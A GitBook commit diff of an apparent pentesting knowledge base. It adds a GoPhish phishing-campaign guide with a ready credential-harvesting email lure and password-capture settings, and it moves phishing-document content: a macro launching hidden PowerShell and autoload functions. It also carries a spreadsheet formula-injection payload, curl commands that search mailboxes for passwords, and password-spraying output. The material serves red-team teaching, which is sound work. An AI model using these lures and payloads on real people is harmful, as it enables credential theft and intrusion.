GitBook: [master] 10 pages and 25 assets modified

1911-pentesting-fox.md

@@ -10,7 +10,7 @@ dht udp "DHT Nodes"
 
 ![](.gitbook/assets/image%20%28182%29.png)
 
-![](.gitbook/assets/image%20%28345%29%20%281%29.png)
+![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29%20%282%29.png)
 
 InfluxDB
 

SUMMARY.md

@@ -457,8 +457,9 @@
     * [Pickle Rick](ctf-write-ups/try-hack-me/pickle-rick.md)
 * [1911 - Pentesting fox](1911-pentesting-fox.md)
 * [Online Platforms with API](online-platforms-with-api.md)
-* [Phising Documents](phising-documents/README.md)
+* [Phishing Methodology](phising-documents/README.md)
   * [Detecting Phising](phising-documents/detecting-phising.md)
+  * [Phishing Documents](phising-documents/phishing-documents.md)
 * [Reset/Forgoten Password Bypass](reset-password.md)
 * [Stealing Sensitive Information Disclosure from a Web](stealing-sensitive-information-disclosure-from-a-web.md)
 

mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md

@@ -76,7 +76,7 @@ When checking the code of the Content Provider **look** also for **functions** n
 
 ![](../../../.gitbook/assets/image%20%28211%29.png)
 
-![](../../../.gitbook/assets/image%20%28254%29.png)
+![](../../../.gitbook/assets/image%20%28254%29%20%281%29%20%281%29%20%281%29.png)
 
 Because you will be able to call them
 

pentesting-web/formula-injection.md

@@ -41,5 +41,5 @@ The good news is that **this payload is executed automatically when the file is
 
 It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`**
 
-![](../.gitbook/assets/image%20%2825%29%20%281%29.png)
+![](../.gitbook/assets/image%20%2825%29%20%282%29%20%281%29.png)
 

pentesting/pentesting-imap.md

@@ -93,50 +93,58 @@ From [here](https://donsutherland.org/crib/imap)
 
 Basic navigation is possible with [CURL](https://ec.haxx.se/usingcurl/usingcurl-reademail#imap), but the documentation is light on details so checking the [source](https://github.com/curl/curl/blob/master/lib/imap.c) is recommended for precise details.
 
-1. Listing mailboxes (imap command `LIST "" "*"`)
-    ```sh
-    $ curl -k 'imaps://1.2.3.4/' --user user:pass
-    ```
-2. Listing messages in a mailbox (imap command `SELECT INBOX` and then `SEARCH ALL`)
-    ```sh
-    $ curl -k 'imaps://1.2.3.4/INBOX?ALL' --user user:pass
-    ```
-    The result of this search is a list of message indicies.
-    
-    Its also possible to provide more complex search terms. e.g. searching for drafts with password in mail body:
-    ```sh
-    $ curl -k 'imaps://1.2.3.4/Drafts?TEXT password' --user user:pass
-    ```
-    
-    A nice overview of the search terms possible is located [here](https://www.atmail.com/blog/imap-commands/).
-3. Downloading a message (imap command `SELECT Drafts` and then `FETCH 1 BODY[]`)
-    ```sh
-    $ curl -k 'imaps://1.2.3.4/Drafts;MAILINDEX=1' --user user:pass
-    ```
-    
-    The mail index will be the same index returned from the search operation.
-    
+1. Listing mailboxes \(imap command `LIST "" "*"`\)
 
-It is also possible to use `UID` (unique id) to access messages, however it is less conveniant as the search command needs to be manually formatted. E.g.
-```sh
+   ```bash
+    $ curl -k 'imaps://1.2.3.4/' --user user:pass
+   ```
+
+2. Listing messages in a mailbox \(imap command `SELECT INBOX` and then `SEARCH ALL`\)
+
+   ```bash
+    $ curl -k 'imaps://1.2.3.4/INBOX?ALL' --user user:pass
+   ```
+
+   The result of this search is a list of message indicies.
+
+   Its also possible to provide more complex search terms. e.g. searching for drafts with password in mail body:
+
+   ```bash
+    $ curl -k 'imaps://1.2.3.4/Drafts?TEXT password' --user user:pass
+   ```
+
+   A nice overview of the search terms possible is located [here](https://www.atmail.com/blog/imap-commands/).
+
+3. Downloading a message \(imap command `SELECT Drafts` and then `FETCH 1 BODY[]`\)
+
+   ```bash
+    $ curl -k 'imaps://1.2.3.4/Drafts;MAILINDEX=1' --user user:pass
+   ```
+
+   The mail index will be the same index returned from the search operation.
+
+It is also possible to use `UID` \(unique id\) to access messages, however it is less conveniant as the search command needs to be manually formatted. E.g.
+
+```bash
 $ curl -k 'imaps://1.2.3.4/INBOX' -X 'UID SEARCH ALL' --user user:pass
 $ curl -k 'imaps://1.2.3.4/INBOX;UID=1' --user user:pass
 ```
 
-Also, possible to download just parts of a message, e.g. subject and sender of first 5 messages (the `-v` is required to see the subject and sender):
-```sh
+Also, possible to download just parts of a message, e.g. subject and sender of first 5 messages \(the `-v` is required to see the subject and sender\):
+
+```bash
 $ curl -k 'imaps://1.2.3.4/INBOX' -X 'FETCH 1:5 BODY[HEADER.FIELDS (SUBJECT FROM)]' --user user:pass -v 2>&1 | grep '^<'
 ```
 
 Although, its probably cleaner to just write a little for loop:
-```
+
+```text
 for m in {1..5}; do
   echo $m
   curl "imap://1.2.3.4/INBOX;MAILINDEX=$m;SECTION=HEADER.FIELDS%20(SUBJECT%20FROM)" --user user:pass
 done
 ```
 
-
 ## Shodan
 
 * `port:143 CAPABILITY`

pentesting/pentesting-web/wordpress.md

@@ -183,7 +183,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t
 </methodCall>
 ```
 
-![](../../.gitbook/assets/image%20%28107%29%20%282%29%20%282%29.png)
+![](../../.gitbook/assets/image%20%28107%29%20%282%29%20%282%29%20%282%29.png)
 
 ![](../../.gitbook/assets/image%20%28224%29.png)
 

phising-documents/README.md

@@ -1,42 +1,4 @@
-# Phising Documents
-
-Microsoft Word performs file data validation prior to opening a file. Data validation is performed in the form of data structure identification, against the OfficeOpenXML standard. If any error occurs during the data structure identification, the file being analysed will not be opened.
-
-Usually Word files containing macros uses the `.docm` extension. However, it's possible to rename the file changing the file extension and still keep their macro executing capabilities.  
-For example, an RTF file does not support macros, by design, but a DOCM file renamed to RTF will be handled by Microsoft Word and will be capable of macro execution.  
-The same internals and mechanisms apply to all software of the Microsoft Office Suite \(Excel, PowerPoint etc.\).
-
-You can use the following command to check with extensions are going to be executed by some Office programs:
-
-```bash
-assoc | findstr /i "word excel powerp"
-```
-
-DOCX files referencing a remote template \(File –Options –Add-ins –Manage: Templates –Go\) that includes macros can “execute” macros as well.
-
-### Word with external image
-
-Go to: _Insert --> Quick Parts --> Field_  
-_**Categories**: Links and References, **Filed names**: includePicture, and **Filename or URL**: http://<ip>/whatever_
-
-![](../.gitbook/assets/image%20%28347%29.png)
-
-### Macros Code
-
-```bash
-Dim author As String
-author = oWB.BuiltinDocumentProperties("Author")
-With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
- .StdIn.WriteLine author
- .StdIn.WriteBlackLines 1
-```
-
-## Autoload functions
-
-The more common they are, the more probable the AV will detect it.
-
-* AutoOpen\(\)
-* Document\_Open\(\)
+# Phishing Methodology
 
 ## Methodology
 
@@ -82,7 +44,7 @@ The more common they are, the more probable the AV will detect it.
 * [https://dnstwister.report/](https://dnstwister.report/)
 * [https://www.internetmarketingninjas.com/tools/free-tools/domain-typo-generator/](https://www.internetmarketingninjas.com/tools/free-tools/domain-typo-generator/)
 
-## GoPhish
+## Configuring GoPhish
 
 ### Installation
 
@@ -237,7 +199,7 @@ ss -l | grep "3333\|443"
 service gophish stop
 ```
 
-## SPAM filters bypass
+## Configuring mail server and domain
 
 ### Wait
 
@@ -331,6 +293,70 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke
 
 ​​You can request your domain/IP to be removed at [https://sender.office.com/](https://sender.office.com/).
 
+## Create & Launch GoPhish Campaign
+
+### Sending Profile
+
+* Set some **name to identify** the sender profile
+* Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._
+* You can leave blank the username and password, but make sure to check the Ignore Certificate Errors
+
+![](../.gitbook/assets/image%20%2825%29.png)
+
+### Email Template
+
+* Set some **name to identify** the template
+* Then write a **subject** \(nothing estrange, just something you could expect to read in a regular email\)
+* Make sure you have checked "**Add Tracking Image**"
+* Write the **email template** \(you can use variables like in the following example\):
+
+```markup
+<html>
+<head>
+	<title></title>
+</head>
+<body>
+<p class="MsoNormal"><span style="font-size:10.0pt;font-family:&quot;Verdana&quot;,sans-serif;color:black">Dear {{.FirstName}} {{.LastName}},</span></p>
+
+<p class="MsoNormal"><span style="font-size:10.0pt;font-family:&quot;Verdana&quot;,sans-serif;color:black">As you may be aware, due to the large number of employees working from home, the "PLATFORM NAME" platform is being migrated to a new domain with an improved and more secure version. To finalize account migration, please use the following link to log into the new HR portal and move your account to the new site: <a href="{{.URL}}"> "PLATFORM NAME" login portal </a><br />
+<br />
+Please Note: We require all users to move their accounts by 04/01/2021. Failure to confirm account migration may prevent you from logging into the application after the migration process is complete.<br />
+<br />
+Regards,</span></p>
+
+WRITE HERE SOME SIGNATURE OF SOMEONE FROM THE COMPANY
+
+<p>{{.Tracker}}</p>
+</body>
+</html>
+```
+
+Note that **in order to increase the credibility of the email**, it's recommended to use some signature from an email from the client. Suggestions: 
+
+* Send an email to a **non existent address** and check if the response has any signature.
+* Search for **public emails** like info@ex.com or press@ex.com or public@ex.com and send them an email and wait for the response.
+* Try to contact **some valid discovered** email and wait for the response
+
+![](../.gitbook/assets/image%20%2861%29.png)
+
+### Landing Page
+
+* Write a **name**
+* **Write the HTML code** of the web page. Note that you can **import** web pages.
+* Mark **Capture Submitted Data** and **Capture Passwords**
+* Set a **redirection**
+
+![](../.gitbook/assets/image%20%2873%29.png)
+
+{% hint style="info" %}
+Usually you will need to modify the HTML code of the page and make some tests in local \(maybe using some Apache server\) **until you like the results.** Then, write that HTML code in the box.  
+Note that if you need to **use some static resources** for the HTML \(maybe some CSS and JS pages\) you can save them in _**/opt/gophish/static/endpoint**_ and then access them from _**/static/&lt;filename&gt;**_
+{% endhint %}
+
+{% hint style="info" %}
+For the redirection you could **redirect the users to the legit main web page** of the victim, or redirect them to _/static/migration.html_ for example, put some **spinning wheel \(**[**https://loading.io/**](https://loading.io/)**\) for 5 seconds and then indicate that the process was successful**.
+{% endhint %}
+
 ## Detecting the detection
 
 Obviously one of the best ways to know if you have been busted is to **search your domain inside blacklists**. If it appears listed, somehow your domain was detected as suspicions.  

phising-documents/phishing-documents.md

@@ -0,0 +1,40 @@
+# Phishing Documents
+
+Microsoft Word performs file data validation prior to opening a file. Data validation is performed in the form of data structure identification, against the OfficeOpenXML standard. If any error occurs during the data structure identification, the file being analysed will not be opened.
+
+Usually Word files containing macros uses the `.docm` extension. However, it's possible to rename the file changing the file extension and still keep their macro executing capabilities.  
+For example, an RTF file does not support macros, by design, but a DOCM file renamed to RTF will be handled by Microsoft Word and will be capable of macro execution.  
+The same internals and mechanisms apply to all software of the Microsoft Office Suite \(Excel, PowerPoint etc.\).
+
+You can use the following command to check with extensions are going to be executed by some Office programs:
+
+```bash
+assoc | findstr /i "word excel powerp"
+```
+
+DOCX files referencing a remote template \(File –Options –Add-ins –Manage: Templates –Go\) that includes macros can “execute” macros as well.
+
+### Word with external image
+
+Go to: _Insert --> Quick Parts --> Field_  
+_**Categories**: Links and References, **Filed names**: includePicture, and **Filename or URL**: http://<ip>/whatever_
+
+![](../.gitbook/assets/image%20%28347%29.png)
+
+### Macros Code
+
+```bash
+Dim author As String
+author = oWB.BuiltinDocumentProperties("Author")
+With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
+ .StdIn.WriteLine author
+ .StdIn.WriteBlackLines 1
+```
+
+## Autoload functions
+
+The more common they are, the more probable the AV will detect it.
+
+* AutoOpen\(\)
+* Document\_Open\(\)
+

reversing/cryptographic-algorithms/README.md

@@ -145,7 +145,7 @@ You can identify both of them checking the constants. Note that the sha\_init ha
 
 Note the use of more constants
 
-![](../../.gitbook/assets/image%20%28253%29.png)
+![](../../.gitbook/assets/image%20%28253%29%20%281%29.png)
 
 ## CRC \(hash\)
 
@@ -177,7 +177,7 @@ A CRC hash algorithm looks like:
 
 The graph is quiet large:
 
-![](../../.gitbook/assets/image%20%28207%29%20%282%29.png)
+![](../../.gitbook/assets/image%20%28207%29%20%282%29%20%281%29.png)
 
 Check **3 comparisons to recognise it**:
 

windows/active-directory-methodology/password-spraying.md

@@ -74,43 +74,41 @@ apt-get install spray
 spray -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPe
 ```
 
--------------------
-
 ## Outlook Web Access
 
 There are multiples tools for password spraying outlook.
 
-* With [MSF Owa_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_login/)
-* with [MSF Owa_ews_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_ews_login/)
-* With [Ruler](https://github.com/sensepost/ruler) (reliable!)
-* With [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) (Powershell)
-* With [MailSniper](https://github.com/dafthack/MailSniper) (Powershell)
+* With [MSF Owa\_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_login/)
+* with [MSF Owa\_ews\_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_ews_login/)
+* With [Ruler](https://github.com/sensepost/ruler) \(reliable!\)
+* With [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) \(Powershell\)
+* With [MailSniper](https://github.com/dafthack/MailSniper) \(Powershell\)
 
-To use any of these tools, you need a user list and a password / a small list of passwords to spray. 
+To use any of these tools, you need a user list and a password / a small list of passwords to spray.
 
-```sh
+```bash
 $ ./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
-	[x] Failed: larsson:Summer2020
-	[x] Failed: cube0x0:Summer2020
-	[x] Failed: a.admin:Summer2020
-	[x] Failed: c.cube:Summer2020
-	[+] Success: s.svensson:Summer2020
-	[x] Failed: s.sven:Summer2020
-	[x] Failed: j.jenny:Summer2020
-	[x] Failed: t.teresa:Summer2020
-	[x] Failed: t.trump:Summer2020
-	[x] Failed: a.adams:Summer2020
-	[x] Failed: l.larsson:Summer2020
-	[x] Failed: CUBE0X0:Summer2020
-	[x] Failed: A.ADMIN:Summer2020
-	[x] Failed: C.CUBE:Summer2020
-	[+] Success: S.SVENSSON:Summer2020
+    [x] Failed: larsson:Summer2020
+    [x] Failed: cube0x0:Summer2020
+    [x] Failed: a.admin:Summer2020
+    [x] Failed: c.cube:Summer2020
+    [+] Success: s.svensson:Summer2020
+    [x] Failed: s.sven:Summer2020
+    [x] Failed: j.jenny:Summer2020
+    [x] Failed: t.teresa:Summer2020
+    [x] Failed: t.trump:Summer2020
+    [x] Failed: a.adams:Summer2020
+    [x] Failed: l.larsson:Summer2020
+    [x] Failed: CUBE0X0:Summer2020
+    [x] Failed: A.ADMIN:Summer2020
+    [x] Failed: C.CUBE:Summer2020
+    [+] Success: S.SVENSSON:Summer2020
 ```
 
-
 ## References :
 
-- https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying
-- https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell
-- www.blackhillsinfosec.com/?p=5296
-- https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying
+* [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying)
+* [https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell](https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell)
+* www.blackhillsinfosec.com/?p=5296
+* [https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying](https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying)
+